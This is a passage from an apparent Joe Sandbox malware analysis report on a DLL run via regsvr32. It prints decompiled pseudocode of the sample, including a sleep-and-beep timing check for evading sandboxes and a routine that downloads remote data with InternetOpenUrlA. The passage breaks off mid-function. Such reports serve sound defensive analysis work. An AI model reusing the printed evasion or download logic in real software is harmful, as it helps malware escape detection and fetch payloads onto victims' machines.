    • Opcode Fuzzy Hash: 5fe9c07127f5f08f9aeaca650adedbe1d1914745b37b83f29c844dccc8af9e35
    • Instruction Fuzzy Hash: 11219471D0072DBFDB318E68CE40AAF3A69EB85BA4F124995F8245F258C3309D418BE0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 73%
    			E6F845D90(void* __eflags) {
    				char _v5;
    				char _v6;
    				char _v7;
    				char _v8;
    				char _v9;
    				char _v10;
    				char _v11;
    				char _v12;
    				char _v13;
    				char _v14;
    				char _v15;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				CHAR* _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				intOrPtr _v88;
    				CHAR* _v92;
    				intOrPtr _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				intOrPtr _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _t86;
    
    				_v5 = 0;
    				_t86 = E6F842640(L"KERNEL32.dll", 0); // executed
    				_v24 = _t86;
    				_v20 = E6F843C50(E6F844F10( &_v5));
    				_v28 = _v24(_v20);
    				if(_v28 == 0) {
    					_v6 = 0;
    					_v36 = E6F842430(L"KERNEL32.dll", 0);
    					_v32 = E6F843BF0(E6F843DF0( &_v6));
    					_v36(_v32);
    				}
    				_v7 = 0;
    				_v44 = E6F842640(L"KERNEL32.dll", 0);
    				_v40 = E6F843C90(E6F844120( &_v7));
    				_v48 = _v44(_v40);
    				if(_v48 == 0) {
    					_v8 = 0;
    					_v56 = E6F842430(L"KERNEL32.dll", 0);
    					_v52 = E6F843CD0(E6F845090( &_v8));
    					_v56(_v52);
    				}
    				_v9 = 0;
    				_v64 = E6F842640(L"KERNEL32.dll", 0);
    				_v60 = E6F843B10(E6F844E00( &_v9));
    				_v68 = _v64(_v60);
    				if(_v68 == 0) {
    					_v10 = 0;
    					_v76 = E6F842430(L"KERNEL32.dll", 0);
    					_v72 = E6F843B30(E6F8443F0( &_v10));
    					LoadLibraryA(_v72);
    				}
    				_v11 = 0;
    				_v84 = E6F842640(L"KERNEL32.dll", 0);
    				_v80 = E6F843BD0(E6F844F90( &_v11));
    				_v88 = _v84(_v80);
    				if(_v88 == 0) {
    					_v12 = 0;
    					_v96 = E6F842430(L"KERNEL32.dll", 0);
    					_v92 = E6F843C10(E6F844A40( &_v12));
    					LoadLibraryA(_v92);
    				}
    				_v13 = 0;
    				_v104 = E6F842640(L"KERNEL32.dll", 0);
    				_v100 = E6F843BB0(E6F845010( &_v13));
    				_v108 = _v104(_v100);
    				if(_v108 == 0) {
    					_v14 = 0;
    					_v116 = E6F842430(L"KERNEL32.dll", 0);
    					_v112 = E6F843C30(E6F844AC0( &_v14));
    					_v116(_v112);
    				}
    				_v15 = 0;
    				_v124 = E6F842640(L"KERNEL32.dll", 0);
    				_v120 = E6F843B70(E6F844510( &_v15));
    				_v128 = _v124(_v120);
    				if(_v128 == 0) {
    					_v16 = 0;
    					_v136 = E6F842430(L"Kernel32.dll", 0);
    					_v132 = E6F843B90(E6F845200( &_v16));
    					_v136(_v132);
    				}
    				return 1;
    			}

    APIs
    • LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845EBF
    • LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845F22
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID: KERNEL32.dll$Kernel32.dll
    • API String ID: 1029625771-1263921953
    • Opcode ID: a53251786990ada07ae704f3b510e4ac8dfb0528a348271fcb933bfbac7f449a
    • Instruction ID: a1940832c835b5b2614a1ceaa320f32556093bfbb275923765f7b1aac98d59ab
    • Opcode Fuzzy Hash: a53251786990ada07ae704f3b510e4ac8dfb0528a348271fcb933bfbac7f449a
    • Instruction Fuzzy Hash: 6271E570E1435CAFCF14DBF8D855BDEBBB1AF48308F1049A9E006AF291EB745A058B91
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 69%
    			E6F846000(char* _a4) {
    				char* _v8;
    				long _v12;
    				void* _v16;
    				void* _v20;
    				char* _v24;
    				char* _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				char* _v56;
    				char* _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				void _v1092;
    				char* _t67;
    				void* _t103;
    
    				_v16 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_v32 = E6F842400(0, 0);
    				_v36 = _v32(_a4, 1, 0);
    				if(_v36 != 0) {
    					_v40 = E6F842610(0, 0);
    					_v16 = _v40(0, 0, 0, 0, 0);
    					__eflags = _v16;
    					if(_v16 != 0) {
    						_v44 = E6F8426A0(0, 0);
    						_v20 = InternetOpenUrlA(_v16, _a4, 0, 0, 0x84000000, 0);
    						__eflags = _v20;
    						if(_v20 != 0) {
    							do {
    								_v52 = E6F8424F0(0, 0);
    								InternetReadFile(_v20,  &_v1092, 0x400,  &_v12);
    								_push( &(_v8[_v12])); // executed
    								_t67 = E6F848E3F( &_v1092, __eflags); // executed
    								_v56 = _t67;
    								_v28 = _v56;
    								E6F847040(_v28, _v24, _v8);
    								E6F847040(_v28 + _v8,  &_v1092, _v12);
    								_v60 = _v24;
    								L6F848E48(_v60); // executed
    								_t103 = _t103 + 8;
    								_v24 = _v28;
    								_v8 =  &(_v8[_v12]);
    								__eflags = _v12;
    							} while (_v12 != 0);
    							_v64 = E6F8423A0(0, 0);
    							InternetCloseHandle(_v20);
    							_v68 = E6F8423A0(0, 0);
    							_v68(_v16);
    							return _v24;
    						}
    						_v48 = E6F8423A0(0, 0);
    						_v48(_v16);
    						return 0;
    					}
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • InternetCheckConnectionA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6F846040
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: CheckConnectionInternet
    • String ID:
    • API String ID: 3847983778-0
    • Opcode ID: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
    • Instruction ID: d1d482223b69bb8edfc3ff731b2323e63fd9376ae674a3e03f24be461842c739
    • Opcode Fuzzy Hash: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
    • Instruction Fuzzy Hash: 4C4195B5E4430CBFDB14DFE8C845BEEBBB4AF48705F104999E605BB280D7746A408BA5
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 85%
    			E6F84DB13(void* __ecx) {
    				intOrPtr _t2;
    				signed int _t3;
    				signed int _t5;
    				signed int _t13;
    				signed int _t18;
    				long _t21;
    
    				_t21 = GetLastError();
    				_t2 =  *0x6f85c110; // 0x7
    				_t24 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E6F84DF59(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t5 = E6F84DC48(1, 0x364); // executed
    						_t18 = _t5;
    						__eflags = _t18;
    						if(__eflags != 0) {
    							__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t18);
    							if(__eflags != 0) {
    								E6F84D7BE(_t18, 0x6f85d850);
    								E6F84DC0E(0);
    								goto L13;
    							} else {
    								_t13 = 0;
    								E6F84DF59(__eflags,  *0x6f85c110, 0);
    								_push(_t18);
    								goto L9;
    							}
    						} else {
    							_t13 = 0;
    							__eflags = 0;
    							E6F84DF59(0,  *0x6f85c110, 0);
    							_push(0);
    							L9:
    							E6F84DC0E();
    							goto L4;
    						}
    					}
    				} else {
    					_t18 = E6F84DF1A(_t24, _t2);
    					if(_t18 == 0) {
    						_t2 =  *0x6f85c110; // 0x7
    						goto L6;
    					} else {
    						if(_t18 != 0xffffffff) {
    							L13:
    							_t13 = _t18;
    						} else {
    							L3:
    							_t13 = 0;
    							L4:
    							_t18 = _t13;
    						}
    					}
    				}
    				SetLastError(_t21);
    				asm("sbb edi, edi");
    				return  ~_t18 & _t13;
    			}

    APIs
    • GetLastError.KERNEL32(?,?,?,6F84D472,6F850290,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7,?,?), ref: 6F84DB18
    • _free.LIBCMT ref: 6F84DB75
    • _free.LIBCMT ref: 6F84DBAB
    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7,?,?,00000004), ref: 6F84DBB6
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 6dc0190ed89fc767bf8dfee5fbd56b91385bfc391e691275fadc838d8f060ad3
    • Instruction ID: 86355a4d365e3836fbaf67cdd66dab757e14cbb148d9f0d690256097e9c2f444
    • Opcode Fuzzy Hash: 6dc0190ed89fc767bf8dfee5fbd56b91385bfc391e691275fadc838d8f060ad3
    • Instruction Fuzzy Hash: 1F11E173644B0C7BDB45467C8C84E1A225B9BC33F87200EE5F5349EAC1DF28C825CAA0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 94%
    			E6F848A90(void* __ecx, void* __eflags) {
    				char _v5;
    				long _v12;
    				long _v16;
    				long _v20;
    				long _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v304;
    				signed char _t32;
    				char _t46;
    				char _t47;
    				char _t48;
    
    				_v20 = 0;
    				_v16 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v28 = 0xa;
    				_t32 = E6F845D90(__eflags); // executed
    				if((_t32 & 0x000000ff) == 0) {
    					L15:
    					__eflags = 0;
    					return 0;
    				} else {
    					_v5 = 0;
    					_v36 = E6F8426D0(L"Kernel32.dll", 0);
    					_v32 = E6F843D10(E6F844E80( &_v5));
    					_v36(_v32,  &_v304, 0x100);
    					_v20 =  *((intOrPtr*)(E6F842220(L"Kernel32.dll", 0)))();
    					L2:
    					if(_v12 < _v28) {
    						_v40 = E6F8422E0(L"Kernel32.dll", 0);
    						Sleep(0x1770);
    						_v44 = E6F842580(L"Kernel32.dll", 0);
    						Beep(0, 0xbb8);
    						_v12 = _v12 + 1;
    						goto L2;
    					}
    					_v16 =  *((intOrPtr*)(E6F842220(L"Kernel32.dll", 0)))();
    					_v24 = _v16 - _v20;
    					__eflags = _v24 - 0xd6d8;
    					if(_v24 < 0xd6d8) {
    						goto L15;
    					}
    					__eflags = _v12 - _v28;
    					if(__eflags < 0) {
    						goto L15;
    					}
    					_t46 = E6F847700(__eflags);
    					__eflags = _t46;
    					if(_t46 == 0) {
    						return 1;
    					}
    					_t47 = E6F8469A0( &_v304); // executed
    					__eflags = _t47;
    					if(_t47 != 0) {
    						_t48 = E6F847670(); // executed
    						__eflags = _t48;
    						if(__eflags == 0) {
    							_v48 = E6F847770();
    							__eflags = _v48 - 1;
    							if(_v48 == 1) {
    								__eflags = E6F8471E0();
    								if(__eflags == 0) {
    									E6F846390(__eflags);
    								} else {
    									E6F846390(__eflags);
    								}
    							}
    						} else {
    							E6F846390(__eflags); // executed
    						}
    					}
    					goto L15;
    				}
    			}

    APIs
      • Part of subcall function 6F845D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6F845EBF
    • Sleep.KERNEL32(00001770,Kernel32.dll,00000000), ref: 6F848B32
    • Beep.KERNEL32(00000000,00000BB8,Kernel32.dll,00000000), ref: 6F848B4B
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: BeepLibraryLoadSleep
    • String ID: Kernel32.dll
    • API String ID: 1352138507-1926710522
    • Opcode ID: fc780f837629ca163c3740db5313b4e8c2b6a56102a41d46683a2cc6c63b928f
    • Instruction ID: 21a587792a9cc65cc71f2392e4c5ec6f4648099da91141f1d87972b4c446aeb0
    • Opcode Fuzzy Hash: fc780f837629ca163c3740db5313b4e8c2b6a56102a41d46683a2cc6c63b928f
    • Instruction Fuzzy Hash: 6731D8B0D4830DBEDB409BF88945BEEBAB4AF45308F104CD9D515BE580DBB496448BA6
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 285 6f847670-6f8476e3 call 6f841810 * 2 call 6f842250 call 6f8425b0 PathIsDirectoryA 295 6f8476e5-6f8476ea 285->295 296 6f8476ec 285->296 297 6f8476ee-6f8476f1 295->297 296->297
    C-Code - Quality: 79%
    			E6F847670() {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v268;
    				char _v524;
    				intOrPtr _t12;
    				intOrPtr _t21;
    
    				_t21 =  *0x6f85caf0; // 0x6f85cb3c
    				E6F841810(_t21,  &_v268, 0x100);
    				_t12 =  *0x6f85caec; // 0x6f85cb50
    				E6F841810(_t12,  &_v524, 0x100);
    				_v8 = E6F842250(L"KERNEL32.dll", 0);
    				_v8( &_v268,  &_v524);
    				_v12 = E6F8425B0(L"Shlwapi.dll", 0);
    				if(PathIsDirectoryA( &_v268) == 0) {
    					return 0;
    				}
    				return 1;
    			}

    APIs
    • PathIsDirectoryA.SHLWAPI(?,Shlwapi.dll,00000000), ref: 6F8476DE
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: DirectoryPath
    • String ID: KERNEL32.dll$Shlwapi.dll
    • API String ID: 1580926078-3851112466
    • Opcode ID: 03a8af96d4642d66ca38c3303adebac1e0240632b6df87b60f781fc95533587f
    • Instruction ID: 33944cd915e597f2510a0fbcaba48e7a8676e549ffb375fda9996a46aecf0b15
    • Opcode Fuzzy Hash: 03a8af96d4642d66ca38c3303adebac1e0240632b6df87b60f781fc95533587f
    • Instruction Fuzzy Hash: 9401817691430CBBDF91DBF88C45FCEB77C9B08700F0049D5A248EE180EEB4A6948BA0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 298 6f84fd93-6f84fda8 GetEnvironmentStringsW 299 6f84fe03 298->299 300 6f84fdaa-6f84fdcb call 6f84fd5c call 6f84fca5 298->300 301 6f84fe05-6f84fe07 299->301 300->299 308 6f84fdcd-6f84fdce call 6f84e649 300->308 303 6f84fe10-6f84fe16 301->303 304 6f84fe09-6f84fe0a FreeEnvironmentStringsW 301->304 304->303 310 6f84fdd3-6f84fdd8 308->310 311 6f84fdf8 310->311 312 6f84fdda-6f84fdf0 call 6f84fca5 310->312 314 6f84fdfa-6f84fe01 call 6f84dc0e 311->314 312->311 317 6f84fdf2-6f84fdf6 312->317 314->301 317->314
    C-Code - Quality: 100%
    			E6F84FD93(void* __ecx) {
    				intOrPtr _v8;
    				intOrPtr _t7;
    				void* _t8;
    				void* _t13;
    				void* _t24;
    				WCHAR* _t26;
    
    				_t26 = GetEnvironmentStringsW();
    				if(_t26 == 0) {
    					L7:
    					_t13 = 0;
    				} else {
    					_t17 = E6F84FD5C(_t26) - _t26 >> 1;
    					_t7 = E6F84FCA5(0, 0, _t26, E6F84FD5C(_t26) - _t26 >> 1, 0, 0, 0, 0);
    					_v8 = _t7;
    					if(_t7 == 0) {
    						goto L7;
    					} else {
    						_t8 = E6F84E649(_t7); // executed
    						_t24 = _t8;
    						if(_t24 == 0 || E6F84FCA5(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
    							_t13 = 0;
    						} else {
    							_t13 = _t24;
    							_t24 = 0;
    						}
    						E6F84DC0E(_t24);
    					}
    				}
    				if(_t26 != 0) {
    					FreeEnvironmentStringsW(_t26);
    				}
    				return _t13;
    			}









    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 6F84FD9C
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F84FE0A
      • Part of subcall function 6F84FCA5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6F84E286,6F8512A9,0000FDE9,00000000,?,?,?,6F851022,0000FDE9,00000000,?), ref: 6F84FD51
      • Part of subcall function 6F84E649: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6F850272,?,00000000,?,6F84D4C9,?,00000004,?,?,?,?,6F84CFC7), ref: 6F84E67B
    • _free.LIBCMT ref: 6F84FDFB
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
    • String ID:
    • API String ID: 2560199156-0
    • Opcode ID: 045d09184ceef92e816290fe3f03f12b01b8aa0b277565a8f69443b55af207a7
    • Instruction ID: 8239b9efc693ec0651b762ca2c8e71663e3fbcd7cbe1389ae096f509f780cfd1
    • Opcode Fuzzy Hash: 045d09184ceef92e816290fe3f03f12b01b8aa0b277565a8f69443b55af207a7
    • Instruction Fuzzy Hash: 0401D472A0172D7F371146BF5C88DBB296DDDD29A831009ADB910DF141EB50DD0182F1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 319 6f841910-6f84195d call 6f848c90 call 6f841490 VirtualAlloc
    C-Code - Quality: 100%
    			E6F841910(void* _a4, long _a8, long _a12, long _a16) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    
    				_v8 = E6F848C90("VirtualAlloc", 0xd, 0xd);
    				 *0x6f85c964 = E6F841490(_v8, "kernel32.dll", 0xd, 0xd);
    				_v12 =  *0x6f85c964;
    				return VirtualAlloc(_a4, _a8, _a12, _a16);
    			}





    APIs
    • VirtualAlloc.KERNEL32(00003000,0000000D,0000000D,?,00000004,kernel32.dll,0000000D,0000000D,VirtualAlloc,0000000D,0000000D,00003000,00000004), ref: 6F841957
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID: VirtualAlloc$kernel32.dll
    • API String ID: 4275171209-2067260499
    • Opcode ID: 81074f12ff661b54a6a13cd5921a2b2caa6753463977aba530d0ec1833000579
    • Instruction ID: 5f5af325f23c065529e6076098beafdc531d4de5bd97415e6e5d49f07c0a9253
    • Opcode Fuzzy Hash: 81074f12ff661b54a6a13cd5921a2b2caa6753463977aba530d0ec1833000579
    • Instruction Fuzzy Hash: 02F01275645308BBCB40DFE8DD45F6E77B9AB49B04F004589BA05AB3C0D6709920CBE0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 324 6f847010-6f84703d call 6f8422b0 call 6f8483b0 RtlFreeHeap
    C-Code - Quality: 100%
    			E6F847010(void* _a4) {
    				void* _v8;
    				intOrPtr _v12;
    
    				_v12 = E6F8422B0(L"KERNEL32.dll", 0);
    				_v8 = E6F8483B0();
    				return RtlFreeHeap(_v8, 0, _a4);
    			}





    APIs
    • RtlFreeHeap.NTDLL(6F85CC64,00000000,00000000,KERNEL32.dll,00000000,00000000,6F85CC64), ref: 6F847037
    Strings
    Memory Dump Source
    • Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true
    • Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd
    Similarity
    • API ID: FreeHeap
    • String ID: KERNEL32.dll
    • API String ID: 3298025750-254546324
    • Opcode ID: 39caa41b904c936bd4bb35596485538ca0773ded79e525e903c422c5aeccbeaa
    • Instruction ID: c83b7431b980ba229ae707e1c200519276745f49332a498bf37c3af4a561a172
    • Opcode Fuzzy Hash: 39caa41b904c936bd4bb35596485538ca0773ded79e525e903c422c5aeccbeaa
    • Instruction Fuzzy Hash: 50D017B594430CBBCB00EFF88805B9EBB789B14301F1045A5AA04AF380DA71AA1087E1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 77%
    			E6F8492F6(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
    				void* _t43;
    				char _t44;
    				signed int _t48;
    				signed int _t54;
    				signed int _t55;
    				signed int _t56;
    				signed int _t59;
    				signed char _t67;
    				signed int _t69;
    				void* _t80;
    				signed int _t86;
    				void* _t90;
    				void* _t102;
    				signed int _t110;
    				signed int _t115;
    				signed int _t119;
    				intOrPtr* _t121;
    				void* _t123;
    
    				_t113 = __esi;
    				_t106 = __edi;
    				_t105 = __edx;
    				_push(0x10);
    				E6F849960(__ebx, __edi, __esi);
    				_t43 = E6F848F8C(__ecx, __edx, 0); // executed
    				_t90 = 0x6f85a5d0;
    				if(_t43 == 0) {
    					L11:
    					_t44 = 0;
    					__eflags = 0;
    					goto L12;
    				} else {
    					 *((char*)(_t123 - 0x1d)) = E6F848E91();
    					_t85 = 1;
    					 *((char*)(_t123 - 0x19)) = 1;
    					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    					_t132 =  *0x6f85cfc8;
    					if( *0x6f85cfc8 != 0) {
    						E6F849839(_t105, __edi, __esi, 7);
    						asm("int3");
    						_push(0x10);
    						_push(0x6f85a5f0);
    						E6F849960(1, __edi, __esi);
    						_t48 =  *0x6f85cfec; // 0x1
    						__eflags = _t48;
    						if(_t48 > 0) {
    							 *0x6f85cfec = _t48 - 1;
    							 *(_t123 - 0x1c) = 1;
    							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    							 *((char*)(_t123 - 0x20)) = E6F848E91();
    							 *(_t123 - 4) = 1;
    							__eflags =  *0x6f85cfc8 - 2;
    							if( *0x6f85cfc8 != 2) {
    								E6F849839(_t105, 1, _t113, 7);
    								asm("int3");
    								_push(0xc);
    								_push(0x6f85a618);
    								E6F849960(1, 1, _t113);
    								_t110 =  *(_t123 + 0xc);
    								__eflags = _t110;
    								if(_t110 != 0) {
    									L23:
    									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    									__eflags = _t110 - 1;
    									if(_t110 == 1) {
    										L26:
    										_t86 =  *(_t123 + 0x10);
    										_t115 = E6F8495B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
    										 *(_t123 - 0x1c) = _t115;
    										__eflags = _t115;
    										if(_t115 != 0) {
    											_t55 = E6F8492A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
    											_t115 = _t55;
    											 *(_t123 - 0x1c) = _t115;
    											__eflags = _t115;
    											if(_t115 != 0) {
    												goto L28;
    											}
    										}
    									} else {
    										__eflags = _t110 - 2;
    										if(_t110 == 2) {
    											goto L26;
    										} else {
    											_t86 =  *(_t123 + 0x10);
    											L28:
    											_push(_t86);
    											_push(_t110);
    											_push( *((intOrPtr*)(_t123 + 8)));
    											_t56 = E6F849A40();
    											_t115 = _t56;
    											 *(_t123 - 0x1c) = _t115;
    											__eflags = _t110 - 1;
    											if(_t110 == 1) {
    												__eflags = _t115;
    												if(_t115 == 0) {
    													_push(_t86);
    													_push(_t56);
    													_push( *((intOrPtr*)(_t123 + 8)));
    													_t59 = E6F849A40();
    													__eflags = _t86;
    													_t34 = _t86 != 0;
    													__eflags = _t34;
    													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
    													L14();
    													_pop(_t90);
    													E6F8495B8( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
    												}
    											}
    											__eflags = _t110;
    											if(_t110 == 0) {
    												L33:
    												_t115 = E6F8492A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
    												 *(_t123 - 0x1c) = _t115;
    												__eflags = _t115;
    												if(_t115 != 0) {
    													_t115 = E6F8495B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
    													 *(_t123 - 0x1c) = _t115;
    												}
    											} else {
    												__eflags = _t110 - 3;
    												if(_t110 == 3) {
    													goto L33;
    												}
    											}
    										}
    									}
    									 *(_t123 - 4) = 0xfffffffe;
    									_t54 = _t115;
    								} else {
    									__eflags =  *0x6f85cfec - _t110; // 0x1
    									if(__eflags > 0) {
    										goto L23;
    									} else {
    										_t54 = 0;
    									}
    								}
    								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
    								return _t54;
    							} else {
    								E6F848F5C(1, _t90, 1, _t113);
    								E6F849A52();
    								E6F849AB3();
    								 *0x6f85cfc8 =  *0x6f85cfc8 & 0x00000000;
    								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    								E6F849492();
    								_t67 = E6F8490FE( *((intOrPtr*)(_t123 + 8)), 0);
    								asm("sbb esi, esi");
    								_t119 =  ~(_t67 & 0x000000ff) & 1;
    								__eflags = _t119;
    								 *(_t123 - 0x1c) = _t119;
    								 *(_t123 - 4) = 0xfffffffe;
    								E6F84949F();
    								_t69 = _t119;
    								goto L18;
    							}
    						} else {
    							_t69 = 0;
    							L18:
